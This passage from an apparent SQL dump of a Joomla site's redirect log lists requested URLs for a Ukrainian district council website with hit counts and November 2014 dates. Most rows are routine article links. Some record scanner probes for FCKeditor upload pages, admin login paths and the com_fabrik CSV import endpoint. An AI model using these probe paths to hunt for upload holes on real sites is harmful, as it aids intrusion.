00:00:00',301),(10935,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15&lang=en&Itemid=0','','','',4,0,'2014-11-15 10:06:28','0000-00-00 00:00:00',301),(10936,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15&lang=en&Itemid=','','','',3,0,'2014-11-15 10:06:31','0000-00-00 00:00:00',301),(10937,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&lang=uk','','','',5,0,'2014-11-15 10:35:36','0000-00-00 00:00:00',301),(10938,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-15 11:00:06','0000-00-00 00:00:00',301),(10939,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=uk','','','',5,0,'2014-11-15 11:32:19','0000-00-00 00:00:00',301),(10940,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=uk','','','',4,0,'2014-11-15 11:35:28','0000-00-00 00:00:00',301),(10941,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1192:-2014-2015-&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-15 12:21:30','0000-00-00 00:00:00',301),(10942,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&lang=uk','','','',5,0,'2014-11-15 12:34:10','0000-00-00 00:00:00',301),(10943,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&lang=uk','','','',5,0,'2014-11-15 12:34:33','0000-00-00 00:00:00',301),(10944,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=uk','','','',5,0,'2014-11-15 12:35:44','0000-00-00 00:00:00',301),(10945,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=943:-qq&lang=en&option=com_content&view=article','','','',1,0,'2014-11-15 12:44:07','0000-00-00 00:00:00',301),(10946,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&lang=uk','','','',2,0,'2014-11-15 13:37:10','0000-00-00 00:00:00',301),(10947,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1013:2013-06-01-03-58-38&lang=en&option=com_content&view=article','','','',2,0,'2014-11-15 14:17:38','0000-00-00 00:00:00',301),(10948,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-11-15 14:18:08','0000-00-00 00:00:00',301),(10949,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=uk','','','',4,0,'2014-11-15 14:31:32','0000-00-00 00:00:00',301),(10950,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=uk','','','',7,0,'2014-11-15 14:34:17','0000-00-00 00:00:00',301),(10951,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=uk','','','',7,0,'2014-11-15 14:34:41','0000-00-00 00:00:00',301),(10952,'http://malyn-rayrada.org.ua/editor/filemanager/upload/test.html','','','',1,0,'2014-11-15 15:24:51','0000-00-00 00:00:00',301),(10953,'http://malyn-rayrada.org.ua/editors/fckeditor/editor/filemanager/upload/test.html','','','',2,0,'2014-11-15 15:24:51','0000-00-00 00:00:00',301),(10954,'http://malyn-rayrada.org.ua/admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html','','','',2,0,'2014-11-15 15:24:52','0000-00-00 00:00:00',301),(10955,'http://malyn-rayrada.org.ua/admin/FCKeditor/editor/filemanager/upload/test.html','','','',2,0,'2014-11-15 15:24:52','0000-00-00 00:00:00',301),(10956,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=uk','','','',5,0,'2014-11-15 15:32:35','0000-00-00 00:00:00',301),(10957,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&lang=uk','','','',6,0,'2014-11-15 15:33:22','0000-00-00 00:00:00',301),(10958,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&lang=uk','','','',5,0,'2014-11-15 15:34:09','0000-00-00 00:00:00',301),(10959,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1152:2013-11-28-14-58-05&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-15 15:51:06','0000-00-00 00:00:00',301),(10960,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=963:2013-03-13-06-16-53&Itemid=14&lang=ru&option=com_content&view=article','','','',7,0,'2014-11-15 16:06:53','0000-00-00 00:00:00',301),(10961,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=uk','','','',2,0,'2014-11-15 16:28:07','0000-00-00 00:00:00',301),(10962,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&lang=uk','','','',4,0,'2014-11-15 16:30:29','0000-00-00 00:00:00',301),(10963,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&lang=uk','','','',2,0,'2014-11-15 16:45:00','0000-00-00 00:00:00',301),(10964,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&lang=uk','','','',3,0,'2014-11-15 16:46:51','0000-00-00 00:00:00',301),(10965,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=5&Itemid=0&lang=uk','','','',1,0,'2014-11-15 17:10:39','0000-00-00 00:00:00',301),(10966,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=uk','','','',3,0,'2014-11-15 17:22:05','0000-00-00 00:00:00',301),(10967,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&lang=uk','','','',2,0,'2014-11-15 17:24:03','0000-00-00 00:00:00',301),(10968,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=975:-------------2012-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-15 17:24:53','0000-00-00 00:00:00',301),(10969,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-15 18:50:06','0000-00-00 00:00:00',301),(10970,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-15 19:04:28','0000-00-00 00:00:00',301),(10971,'http://malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1372:2014-08-04-19-26-16&tmpl=component&print=1&layout=default&page=&lang=uk','','','',2,0,'2014-11-15 19:16:28','0000-00-00 00:00:00',301),(10972,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-15 19:20:05','0000-00-00 00:00:00',301),(10973,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=ru&Itemid=','','','',3,0,'2014-11-15 19:20:35','0000-00-00 00:00:00',301),(10974,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=uk&Itemid=0','','','',6,0,'2014-11-15 20:18:36','0000-00-00 00:00:00',301),(10975,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-15 20:24:59','0000-00-00 00:00:00',301),(10976,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-15 20:25:08','0000-00-00 00:00:00',301),(10977,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=7&lang=en/wp-login.php','','','',2,0,'2014-11-15 20:31:05','0000-00-00 00:00:00',301),(10978,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=7&lang=en/administrator/index.php','','','',2,0,'2014-11-15 20:31:06','0000-00-00 00:00:00',301),(10979,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=7&lang=en/admin.php','','','',2,0,'2014-11-15 20:31:07','0000-00-00 00:00:00',301),(10980,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=7&lang=en/bitrix/admin/index.php?lang=en','','','',2,0,'2014-11-15 20:31:08','0000-00-00 00:00:00',301),(10981,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=7&lang=en/admin/login.php','','','',2,0,'2014-11-15 20:31:10','0000-00-00 00:00:00',301),(10982,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=7&lang=en/admin/','','','',2,0,'2014-11-15 20:31:11','0000-00-00 00:00:00',301),(10983,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=7&lang=en/user/','','','',2,0,'2014-11-15 20:31:12','0000-00-00 00:00:00',301),(10984,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-11-15 21:46:12','0000-00-00 00:00:00',301),(10985,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-11-15 21:50:26','0000-00-00 00:00:00',301),(10986,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-11-15 22:24:23','0000-00-00 00:00:00',301),(10987,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11&lang=uk','','','',7,0,'2014-11-15 23:10:51','0000-00-00 00:00:00',301),(10988,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=uk','','','',5,0,'2014-11-15 23:11:44','0000-00-00 00:00:00',301),(10989,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&lang=uk','','','',2,0,'2014-11-15 23:12:19','0000-00-00 00:00:00',301),(10990,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=uk','','','',3,0,'2014-11-15 23:12:38','0000-00-00 00:00:00',301),(10991,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=uk','','','',2,0,'2014-11-16 00:02:15','0000-00-00 00:00:00',301),(10992,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&lang=uk','','','',4,0,'2014-11-16 00:02:22','0000-00-00 00:00:00',301),(10993,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=uk','','','',5,0,'2014-11-16 00:03:32','0000-00-00 00:00:00',301),(10994,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&lang=uk','','','',5,0,'2014-11-16 00:06:45','0000-00-00 00:00:00',301),(10995,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&lang=uk','','','',4,0,'2014-11-16 01:03:16','0000-00-00 00:00:00',301),(10996,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&lang=uk','','','',2,0,'2014-11-16 01:07:23','0000-00-00 00:00:00',301),(10997,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=uk','','','',2,0,'2014-11-16 01:12:01','0000-00-00 00:00:00',301),(10998,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=en&Itemid=0','','','',4,0,'2014-11-16 01:39:58','0000-00-00 00:00:00',301),(10999,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1079:-l-2011-2013-r&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-16 01:49:45','0000-00-00 00:00:00',301),(11000,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&lang=uk','','','',4,0,'2014-11-16 03:08:48','0000-00-00 00:00:00',301),(11001,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&lang=uk','','','',3,0,'2014-11-16 03:09:58','0000-00-00 00:00:00',301),(11002,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=uk','','','',2,0,'2014-11-16 03:10:16','0000-00-00 00:00:00',301),(11003,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-16 03:49:47','0000-00-00 00:00:00',301),(11004,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=en&Itemid=0','','','',4,0,'2014-11-16 04:23:43','0000-00-00 00:00:00',301),(11005,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1035:2013-06-25-09-55-31&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-16 04:26:19','0000-00-00 00:00:00',301),(11006,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-16 05:23:09','0000-00-00 00:00:00',301),(11007,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&lang=uk','','','',2,0,'2014-11-16 05:25:13','0000-00-00 00:00:00',301),(11008,'http://malyn-rayrada.org.ua/home/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-16 05:32:22','0000-00-00 00:00:00',301),(11009,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-16 05:39:19','0000-00-00 00:00:00',301),(11010,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-16 05:47:08','0000-00-00 00:00:00',301),(11011,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&lang=uk','','','',2,0,'2014-11-16 06:00:56','0000-00-00 00:00:00',301),(11012,'http://www.malyn-rayrada.org.ua/mdi/components/com_community/index.html','','','',2,0,'2014-11-16 06:35:07','0000-00-00 00:00:00',301),(11013,'http://www.malyn-rayrada.org.ua/mdi/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',2,0,'2014-11-16 06:35:10','0000-00-00 00:00:00',301),(11014,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=uk','','','',4,0,'2014-11-16 06:37:51','0000-00-00 00:00:00',301),(11015,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11&lang=uk','','','',2,0,'2014-11-16 06:47:11','0000-00-00 00:00:00',301),(11016,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-11-16 06:50:42','0000-00-00 00:00:00',301),(11017,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-16 06:54:40','0000-00-00 00:00:00',301),(11018,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-16 07:16:04','0000-00-00 00:00:00',301),(11019,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-16 07:20:06','0000-00-00 00:00:00',301),(11020,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-16 07:23:57','0000-00-00 00:00:00',301),(11021,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-16 07:29:39','0000-00-00 00:00:00',301),(11022,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1078:-2007-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-16 07:36:17','0000-00-00 00:00:00',301),(11023,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-16 07:40:09','0000-00-00 00:00:00',301),(11024,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=51:--19072013-&Itemid=92&lang=ru','','','',2,0,'2014-11-16 08:07:49','0000-00-00 00:00:00',301),(11025,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=51:--19072013-&Itemid=92&lang=uk','','','',1,0,'2014-11-16 08:09:06','0000-00-00 00:00:00',301),(11026,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-16 08:09:29','0000-00-00 00:00:00',301),(11027,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-11-16 08:19:29','0000-00-00 00:00:00',301),(11028,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1216:-q-q&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-16 09:11:07','0000-00-00 00:00:00',301),(11029,'http://www.malyn-rayrada.org.ua/prensa/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-16 09:59:18','0000-00-00 00:00:00',301),(11030,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-16 12:45:05','0000-00-00 00:00:00',301),(11031,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-16 12:47:46','0000-00-00 00:00:00',301),(11032,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-16 12:56:40','0000-00-00 00:00:00',301),(11033,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-11-16 13:17:13','0000-00-00 00:00:00',301),(11034,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-11-16 13:24:57','0000-00-00 00:00:00',301),(11035,'http://www.malyn-rayrada.org.ua/rta/components/com_community/index.html','','','',1,0,'2014-11-16 14:17:34','0000-00-00 00:00:00',301),(11036,'http://www.malyn-rayrada.org.ua/rta/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-16 14:17:37','0000-00-00 00:00:00',301),(11037,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-16 15:47:26','0000-00-00 00:00:00',301),(11038,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-16 16:04:37','0000-00-00 00:00:00',301),(11039,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-16 16:21:48','0000-00-00 00:00:00',301),(11040,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1111:2013-10-22-16-06-36&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-16 17:05:11','0000-00-00 00:00:00',301),(11041,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1208:2014-01-31-13-48-49&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-16 18:40:38','0000-00-00 00:00:00',301),(11042,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1378:2014-08-27-11-29-34&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-11-16 19:12:24','0000-00-00 00:00:00',301),(11043,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-16 19:18:02','0000-00-00 00:00:00',301),(11044,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-16 19:33:38','0000-00-00 00:00:00',301),(11045,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-16 19:36:59','0000-00-00 00:00:00',301),(11046,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-16 19:44:04','0000-00-00 00:00:00',301),(11047,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&lang=ru&Itemid=','','','',4,0,'2014-11-16 19:45:19','0000-00-00 00:00:00',301),(11048,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-16 19:51:04','0000-00-00 00:00:00',301),(11049,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-16 20:12:04','0000-00-00 00:00:00',301),(11050,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-16 20:18:57','0000-00-00 00:00:00',301),(11051,'http://malyn-rayrada.org.ua/wbb/components/com_community/index.html','','','',1,0,'2014-11-16 20:44:22','0000-00-00 00:00:00',301),(11052,'http://malyn-rayrada.org.ua/wbb/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-16 20:44:24','0000-00-00 00:00:00',301),(11053,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54:--29112013-&id=1144:-lr&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-16 21:50:30','0000-00-00 00:00:00',301),(11054,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&lang=ru&Itemid=','','','',3,0,'2014-11-16 22:05:47','0000-00-00 00:00:00',301),(11055,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-16 22:08:27','0000-00-00 00:00:00',301),(11056,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-16 22:10:20','0000-00-00 00:00:00',301),(11057,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&lang=uk&Itemid=','','','',3,0,'2014-11-16 22:20:18','0000-00-00 00:00:00',301),(11058,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-16 22:33:06','0000-00-00 00:00:00',301),(11059,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-16 22:37:34','0000-00-00 00:00:00',301),(11060,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=971:-2012-&catid=36&Itemid=70&lang=ru','','','',4,0,'2014-11-16 22:37:53','0000-00-00 00:00:00',301),(11061,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&lang=uk&Itemid=','','','',3,0,'2014-11-16 23:03:47','0000-00-00 00:00:00',301),(11062,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-16 23:28:42','0000-00-00 00:00:00',301),(11063,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-16 23:33:39','0000-00-00 00:00:00',301),(11064,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-16 23:34:45','0000-00-00 00:00:00',301),(11065,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-16 23:35:20','0000-00-00 00:00:00',301),(11066,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-16 23:35:21','0000-00-00 00:00:00',301),(11067,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-16 23:48:24','0000-00-00 00:00:00',301),(11068,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=uk&Itemid=0','','','',5,0,'2014-11-16 23:50:29','0000-00-00 00:00:00',301),(11069,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=969:-2013-&catid=46&Itemid=85&lang=ru','','','',1,0,'2014-11-16 23:51:34','0000-00-00 00:00:00',301),(11070,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-16 23:58:52','0000-00-00 00:00:00',301),(11071,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-17 00:02:57','0000-00-00 00:00:00',301),(11072,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=969:-2013-&catid=46:--21122012&Itemid=85&lang=ru','','','',3,0,'2014-11-17 00:19:18','0000-00-00 00:00:00',301),(11073,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-17 01:39:10','0000-00-00 00:00:00',301),(11074,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&lang=uk&Itemid=','','','',4,0,'2014-11-17 01:54:03','0000-00-00 00:00:00',301),(11075,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=en&Itemid=0','','','',3,0,'2014-11-17 05:40:24','0000-00-00 00:00:00',301),(11076,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=uk&Itemid=0','','','',5,0,'2014-11-17 05:44:16','0000-00-00 00:00:00',301),(11077,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-11-17 05:48:39','0000-00-00 00:00:00',301),(11078,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-17 05:48:45','0000-00-00 00:00:00',301),(11079,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-17 05:56:55','0000-00-00 00:00:00',301),(11080,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-11-17 06:27:35','0000-00-00 00:00:00',301),(11081,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=ru&Itemid=0','','','',6,0,'2014-11-17 06:35:05','0000-00-00 